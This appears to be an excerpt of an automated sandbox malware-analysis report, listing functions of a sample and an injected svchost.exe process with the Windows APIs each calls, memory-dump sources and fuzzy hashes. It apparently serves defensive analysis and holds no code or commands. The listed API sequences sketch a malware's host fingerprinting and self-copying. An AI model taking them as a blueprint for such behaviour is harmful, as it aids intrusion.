APIs

_EH_prolog.MSVCRT ref: 004016CD
#324.MFC42(00000066,?,?,?,0040160A,00000000), ref: 004016DE

Part of subcall function 00401B11: _EH_prolog.MSVCRT ref: 00401B16
Part of subcall function 00401B11: #567.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B24
Part of subcall function 00401B11: #384.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B38
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B4F
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B56
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B5D
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B64
Part of subcall function 00401B11: #2096.MFC42(00000010,00000010,00000009,00000002,00000001,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B79

#1168.MFC42(00000066,?,?,?,0040160A,00000000), ref: 004016F9
#1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,0040160A,00000000), ref: 00401707
LoadIconA.USER32 ref: 0040170D

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Color$H_prolog$#1146#1168#2096#324#384#567IconLoad
String ID:
API String ID: 1570525922-0
Opcode ID: 14627a97b2c76580237a4e20db6eb5b5e94a4411785cf4c2c5d9dbe4e56fc2a2
Instruction ID: 792c10b5caf4369139866adca4fd7813d2dac80267ebf69f26e15c7ab92fc860
Opcode Fuzzy Hash: 14627a97b2c76580237a4e20db6eb5b5e94a4411785cf4c2c5d9dbe4e56fc2a2
Instruction Fuzzy Hash: ECF089B1A00214ABD710AFA5CA0DB9EBAA8EB54304F00493FB441B32C1DBFD6A00C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040235D, Relevance: 7.5, APIs: 5, Instructions: 20COMMON

Download Yara Rule

APIs

#5053.MFC42 ref: 00402361
GetSysColor.USER32 ref: 0040236E
GetSysColor.USER32 ref: 00402375
GetSysColor.USER32 ref: 0040237C
GetSysColor.USER32 ref: 00402383

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Color$#5053
String ID:
API String ID: 680119309-0
Opcode ID: c2cd13360962db9f81c619f9e63e46b75756325e0134da5e99e72c84742973f4
Instruction ID: 9fd4b0b0de83cb852c2de9fcfa50de6b5b46a78d6896a43a0ae3c146f96b08fd
Opcode Fuzzy Hash: c2cd13360962db9f81c619f9e63e46b75756325e0134da5e99e72c84742973f4
Instruction Fuzzy Hash: 80D0EC719507945AD7307BB79C09B0BAEE8EFC1710F02086FE241AB590DAF5D4048F50

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB7, Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401BBC
#2408.MFC42(00000000,?,?,00401633,00000000), ref: 00401BE5
#686.MFC42(00000000,?,?,00401633,00000000), ref: 00401BF0
#616.MFC42(00000000,?,?,00401633,00000000), ref: 00401BFB

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: #2408#616#686H_prolog
String ID:
API String ID: 2448546154-0
Opcode ID: 60e1a6c81dd0e97c4d00e14183edcab5b5207045b989df9bf9a8cc595a335061
Instruction ID: 8071e36fa14699001fbb46182fecce067d7882a0a2dd38a65229a8ff903abceb
Opcode Fuzzy Hash: 60e1a6c81dd0e97c4d00e14183edcab5b5207045b989df9bf9a8cc595a335061
Instruction Fuzzy Hash: E7F08271A01661A7DB25AB69821939EBBB5AF80718F00453FE411773D0CBFD5E01CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00401A08, Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401A0D
#2379.MFC42 ref: 00401A44

Part of subcall function 00401688: #324.MFC42(00000064,00000000), ref: 0040168F

#2514.MFC42 ref: 00401A31
#641.MFC42 ref: 00401A3D

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: #2379#2514#324#641H_prolog
String ID:
API String ID: 2768629142-0
Opcode ID: 5b5c97468d7a1e2bb2ff698cdfdf4de53724e6bfa7d1a2238b5b72a011e947e1
Instruction ID: 02f2689a69859cdcfeaac5338440bd1b7242c65d1092270e31ce3d22fc5a2906
Opcode Fuzzy Hash: 5b5c97468d7a1e2bb2ff698cdfdf4de53724e6bfa7d1a2238b5b72a011e947e1
Instruction Fuzzy Hash: 50E039319015089BCB14EBA1CA5A7ADB334AF20318F60853AA422775E1DBB88A08CA19

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 3172 Parent PID: 3116 svchost.exeCOMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.5%
Total number of Nodes:	316
Total number of Limit Nodes:	5

Executed Functions

Function 00061180, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00061242
FindNextFileW.KERNELBASE ref: 000614B1
FindClose.KERNELBASE ref: 000614C2

Strings

ductVersion, xrefs: 0006128E
., xrefs: 000612EB

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$ductVersion
API String ID: 3541575487-227499276
Opcode ID: c1a82bc0d426269996b66f5f4b1a65c3672b1bae3bf7f1d75180920cafb46292
Instruction ID: 1294b7351c403f64f1c4598a0608ea69b3fcebc94e3f026d69048bb43f88400f
Opcode Fuzzy Hash: c1a82bc0d426269996b66f5f4b1a65c3672b1bae3bf7f1d75180920cafb46292
Instruction Fuzzy Hash: 6E913931A1CB1C8AEB75AB15D4487FA72E3FFD0310F59816EC44AD72B1EE7989868341

Uniqueness

Uniqueness Score: -1.00%

Function 0006B160, Relevance: 5.2, APIs: 3, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 0006B206
SetCurrentDirectoryW.KERNELBASE ref: 0006B25B
RtlExitUserProcess.NTDLL ref: 0006BA53

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: CurrentDirectoryExceptionExitHandlerProcessUserVectored
String ID:
API String ID: 1612252912-0
Opcode ID: 9c553e9492940460de751763cb6ccfa4d075d6d442f24a204fb49aa30d034741
Instruction ID: 9a466b669d77621987ddc4319c0355e7d5d294ab7414c70bb440996955d1a11f
Opcode Fuzzy Hash: 9c553e9492940460de751763cb6ccfa4d075d6d442f24a204fb49aa30d034741
Instruction Fuzzy Hash: 40323770618E19CFE794EB28DC957A973E2FBD4301F508529E44AC72A2DF78D881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00066B60, Relevance: 5.0, APIs: 3, Instructions: 454
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00066D5B
CreateDirectoryW.KERNELBASE ref: 00066E3B
CopyFileW.KERNEL32 ref: 00066EEA

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: CopyCreateDirectoryFileFolderPath
String ID:
API String ID: 160447237-0
Opcode ID: b6e4aca0082ccab7c9555a6bb809b8f700678e567c663f54212b36009d14d611
Instruction ID: bc6fdd6e8ffd66b81772d16755c27774893569230f473c6067776ba9deb0115c
Opcode Fuzzy Hash: b6e4aca0082ccab7c9555a6bb809b8f700678e567c663f54212b36009d14d611
Instruction Fuzzy Hash: 45D1A430618E5D8FD7A5EB28D8547BAB3E2FF95320F50462DE48AC3291EB35D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00067AE0, Relevance: 1.6, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00067B49

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 6ecea40a29f12a1e050033e6a58e961541c8d61ee6ea405a2a50789c507f6fa5
Instruction ID: 959dc4072c0e160d727f3fc7be84a8c6477d3b712d237fd99f3abd9d7519d0f2
Opcode Fuzzy Hash: 6ecea40a29f12a1e050033e6a58e961541c8d61ee6ea405a2a50789c507f6fa5
Instruction Fuzzy Hash: 5241E93021CA094FE798EB69D8A5BAAB7D2FBD4314F84456DF44EC3252DF78D8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00065980, Relevance: 1.6, APIs: 1, Instructions: 131
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32 ref: 000659BD

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 001d2823ce61e18813915d268eef4c6b38eb84a64a035f695c51d128be18e979
Instruction ID: 4adb7f2a2f5e799370ed9747ef61abfa247ce5f89b80b150c2fe2ec7a8682c90
Opcode Fuzzy Hash: 001d2823ce61e18813915d268eef4c6b38eb84a64a035f695c51d128be18e979
Instruction Fuzzy Hash: 81413D3120DB058FE794DF69D894B6BB7E6EBD9351F40462DA48AC3250DF34D841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00077C20, Relevance: 1.6, APIs: 1, Instructions: 70
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32 ref: 00077C9F

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 952ab3489bad23857c2d7a72729d6764a0e5e50f03b0a636941e61ee7e115ede
Instruction ID: d767f7aa30d2cd23145c62680954cdb49282fffe8dfdb50cd38971d9c5461453
Opcode Fuzzy Hash: 952ab3489bad23857c2d7a72729d6764a0e5e50f03b0a636941e61ee7e115ede
Instruction Fuzzy Hash: 8F11EB31A18A044BF755EB28EC557A573D2F7D8310F44422AE40EC32D6DF7C9645CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000636E0, Relevance: 1.5, APIs: 1, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00063726

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction ID: b76d50d95af6a5daaeeb4f254d9fff0cc303d311fd1f9c3c39af30a42e6987fc
Opcode Fuzzy Hash: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction Fuzzy Hash: BCF096B150C6144FD768EF34E80AA53B6F1FB48318F15C49ED40AC7260E734CB8586C1

Uniqueness

Uniqueness Score: -1.00%

Function 00071510, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 0007154E
SetFilePointer.KERNELBASE ref: 00071571
SetFilePointer.KERNELBASE ref: 00071589
ReadFile.KERNELBASE ref: 000715C1
CloseHandle.KERNELBASE ref: 000715CE
CloseHandle.KERNELBASE ref: 000715FA

Strings

ductVersion, xrefs: 00071511, 00071512

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: File$CloseHandlePointer$CreateRead
String ID: ductVersion
API String ID: 1594546554-1003687328
Opcode ID: 4daf13318535f406ffae20052231833df1801ddf36228ad1169f17ff062e561b
Instruction ID: 5d8f9183a53cd1bf83b8883aa3c75dbb9d8e62305a756510244e8b07b2324302
Opcode Fuzzy Hash: 4daf13318535f406ffae20052231833df1801ddf36228ad1169f17ff062e561b
Instruction Fuzzy Hash: 7421BF30718A184FE798AB3C98587AAB6D6EBC9355F50862DB49BC2291DE78C8068345

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBE0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 0007DC6C

Strings

C, xrefs: 0007DC26

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: InformationVolume
String ID: C
API String ID: 2039140958-1037565863
Opcode ID: 1b854539d4af56b1113ef8b2858a64c3c01847ea5a88b83bda8fff6e0ab215ca
Instruction ID: 9f5774c242b9231bad424c0a46e210f31918c341fe13f3d54a5fd73ad7bcc92d
Opcode Fuzzy Hash: 1b854539d4af56b1113ef8b2858a64c3c01847ea5a88b83bda8fff6e0ab215ca
Instruction Fuzzy Hash: 0431D331A28B548BD3559F28D84476BBBE1FFC9304F40892FF089C3251DB799906C796

Uniqueness

Uniqueness Score: -1.00%

Function 000678E0, Relevance: 3.2, APIs: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00067942
SleepEx.KERNEL32 ref: 00067A59

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: ComputerNameSleep
String ID:
API String ID: 3354815184-0
Opcode ID: f7e7a9c4b891bd0cc6f49430622fb2bec7a89d7128c424c3609301cf144bbfc4
Instruction ID: b184a4fd34ebffca596c98160ee10878eef412b33778c35ed16906ca0b05a08e
Opcode Fuzzy Hash: f7e7a9c4b891bd0cc6f49430622fb2bec7a89d7128c424c3609301cf144bbfc4
Instruction Fuzzy Hash: 1C51183161CA088FE758AB58D8997BA77D2FBD8314F94452EE44FC3251EA39C842C683

Uniqueness

Uniqueness Score: -1.00%

Function 0006F350, Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.ADVAPI32 ref: 0006F3C7
CloseHandle.KERNELBASE ref: 0006F43E

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: CloseHandleInformationToken
String ID:
API String ID: 3954737543-0
Opcode ID: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction ID: 97430a39d16fdbbb282d50c8e88614045843972dfa7a14d0073073fec81ce454
Opcode Fuzzy Hash: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction Fuzzy Hash: 2721FD34618B598FE764DF29E4447ABBBE5FB98741F10462EF886C3260DB34C944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00067010, Relevance: 3.1, APIs: 2, Instructions: 83
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0006705F
CreateMutexW.KERNELBASE ref: 000670AF

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateMutexString
String ID:
API String ID: 3336917037-0
Opcode ID: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction ID: 07a72832242c7a6f428e551ff0edd60cd917f5c867511038cdcac0a487b80006
Opcode Fuzzy Hash: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction Fuzzy Hash: 78218430219A498FEB94EF28D4587AB77E2FB98304F50492EA08ED3290CB78C9448752

Uniqueness

Uniqueness Score: -1.00%

Function 0006EE10, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32 ref: 0006EE1B
CoInitializeSecurity.OLE32 ref: 0006EE56

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: Initialize$Security
String ID:
API String ID: 119290355-0
Opcode ID: 2bca9a90dd6e11a1d19d51aa3c2a793cc4639d5afd3d5c1a8065ceb59588dfcf
Instruction ID: 3eb1a4ef56bc9ad2c4b6afcd0900fdca91a594a2af803539afa09d55340442d3
Opcode Fuzzy Hash: 2bca9a90dd6e11a1d19d51aa3c2a793cc4639d5afd3d5c1a8065ceb59588dfcf
Instruction Fuzzy Hash: E0F0A031A183244BE398AF34A81D35BBAE1BB84314F01872EF85AD22D4DF39C85146C1

Uniqueness

Uniqueness Score: -1.00%

Function 00063370, Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32 ref: 000633A2

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ca82d3d9c14972560b7d2655baf75877226bc45e31ad0c4a04ddc5515451c50d
Instruction ID: 6a8438ce2173b2e786cedbd7a9623c2542bfc1c8a9a5b570411d7007789b9f55
Opcode Fuzzy Hash: ca82d3d9c14972560b7d2655baf75877226bc45e31ad0c4a04ddc5515451c50d
Instruction Fuzzy Hash: 29418530618A488BD7B6D718C4453EEB6E3FBD9300F90492AD04FC3295DE389A82C7C2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000649E0, Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

], xrefs: 00064AD6
[, xrefs: 00064ABB

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: [$]
API String ID: 0-2073744556
Opcode ID: 32013062bf322c0ce285ed94c89732c6d9ad4da32383d9f36405c89868e34f70
Instruction ID: c68d3958994b894530a58909fa5eca89f640e855824d1d2b109840020ccacbe4
Opcode Fuzzy Hash: 32013062bf322c0ce285ed94c89732c6d9ad4da32383d9f36405c89868e34f70
Instruction Fuzzy Hash: 5C71F331718B044BD368EF69D89577BB2D7EBC8304F50453DE48AC7292EE70EC068686

Uniqueness

Uniqueness Score: -1.00%

Function 00061B50, Relevance: 2.2, Strings: 1, Instructions: 905COMMON

Download Yara Rule

Strings

@, xrefs: 00061EFE

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: de0696105b094319040806d3ff1b7dfb71a5ef31f6b78aaa138008fed55cd911
Instruction ID: e7bb6df4ab1262c3a2725ff1bb5da8dc3a6ed93e755067277b958428cfc27be8
Opcode Fuzzy Hash: de0696105b094319040806d3ff1b7dfb71a5ef31f6b78aaa138008fed55cd911
Instruction Fuzzy Hash: 85621D30618B498FDBA4DF28C4557EAB7E2FB98310F54892DD48EC3255DB74E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0007AB10, Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

D, xrefs: 0007AD3B

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 3f4eaa510aaf52309da5086d0309ace68d040d6ff477565e220176dfbfa8b966
Instruction ID: 92521d6f8d819a317dbb5b25cc6908a813fecb2e1dc5aa14db22354cede5db0b
Opcode Fuzzy Hash: 3f4eaa510aaf52309da5086d0309ace68d040d6ff477565e220176dfbfa8b966
Instruction Fuzzy Hash: 7EF18330B18E0D8FDB98EF68C455A6977D2FBD9300B54856DE40EC7262DF38E8418B96

Uniqueness

Uniqueness Score: -1.00%

Function 000768F0, Relevance: 1.8, Strings: 1, Instructions: 555COMMON

Download Yara Rule

Strings

@, xrefs: 00076C47

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f8a531e8220cb30f4d64ad8b0fde06207c87cfbcd4d044ea7a4bad17df862fb8
Instruction ID: 2d77929e9b498c13caf13fc07a735db76f58b42e0686f24ece32115e5161af9d
Opcode Fuzzy Hash: f8a531e8220cb30f4d64ad8b0fde06207c87cfbcd4d044ea7a4bad17df862fb8
Instruction Fuzzy Hash: BC020F70718B488FE7A8EF28D45976AB6E1FB99301F54452EE04EC3291DF39D841CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0007B420, Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

8, xrefs: 0007B8B4

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 1fa6986029707459d27ca27e3c7297c3d591b7caa6e60e93f65e526512c60385
Instruction ID: fdf82c843862c23529b60160118c15cbae042d970057da7475b6ec6b15661438
Opcode Fuzzy Hash: 1fa6986029707459d27ca27e3c7297c3d591b7caa6e60e93f65e526512c60385
Instruction Fuzzy Hash: E802093060CB488FE7A4DF29D8457AAB7E5FBD8311F108A2E958EC3250DB78D941CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000788E0, Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

\, xrefs: 00078A92

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: c59adab03c1b6fba4c010502578efc5d52bef2060155ecef05c800cc81c06ccb
Instruction ID: feaa91b24106d5f55a5e0c0df4fa47b3cfc3a2783695bbb219e4e6be828db6ed
Opcode Fuzzy Hash: c59adab03c1b6fba4c010502578efc5d52bef2060155ecef05c800cc81c06ccb
Instruction Fuzzy Hash: 09A1D331658A094BE7659B18C8997BAB3E2FFC8300F54C56ED14EC72A1DF79D842C386

Uniqueness

Uniqueness Score: -1.00%

Function 00071820, Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a20ac6d20214f0669d0be6008a8cde6e36854b07a9f29eedf8e2e2271a47ea
Instruction ID: 05378aa8be32ae717d0a6ded46f5c1ee914f49ae155476b91c6fed83485fb8ce
Opcode Fuzzy Hash: 58a20ac6d20214f0669d0be6008a8cde6e36854b07a9f29eedf8e2e2271a47ea
Instruction Fuzzy Hash: 5FF16031A6CB884BC32D9A6C9C451F9B7D1F799310F54827DD8CFC3283E628E8478689

Uniqueness

Uniqueness Score: -1.00%

Function 0006C960, Relevance: .5, Instructions: 538COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e86fda7c700fc4eeacf95e65527483e887235dd7f6d047b02fce93deb71494
Instruction ID: 012d124d8edfe95bf6c8e7cae0e4b03faf09f91e636a5b7c345ffb5ab24d0fe9
Opcode Fuzzy Hash: 10e86fda7c700fc4eeacf95e65527483e887235dd7f6d047b02fce93deb71494
Instruction Fuzzy Hash: 33E1C631718A084FE758EB3C98567BA73D3EBD9310F54466EE48BC3292EE74DC428685

Uniqueness

Uniqueness Score: -1.00%

Function 00062CCC, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bc98818bbdb6b2067e4294e54d32c9e90768c85cf6177a27a6f2016705fe27
Instruction ID: 0e8fa27bf97e5138d38b275e7413dc50c9163477fdeacac5ab8780545d9beaa1
Opcode Fuzzy Hash: d7bc98818bbdb6b2067e4294e54d32c9e90768c85cf6177a27a6f2016705fe27
Instruction Fuzzy Hash: BCE15130618E498FE7A9EF18C495BEA73E3FB98300F54456D984EC72A1DB78D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00068440, Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28863a2996926e595d567d9808cc3097754cd4f81bb14fd5d3bcab1d227364b9
Instruction ID: 5caad8ed1e651a27710469d3e843d70fa0fcd0a53f44988b9277b5575fd319e0
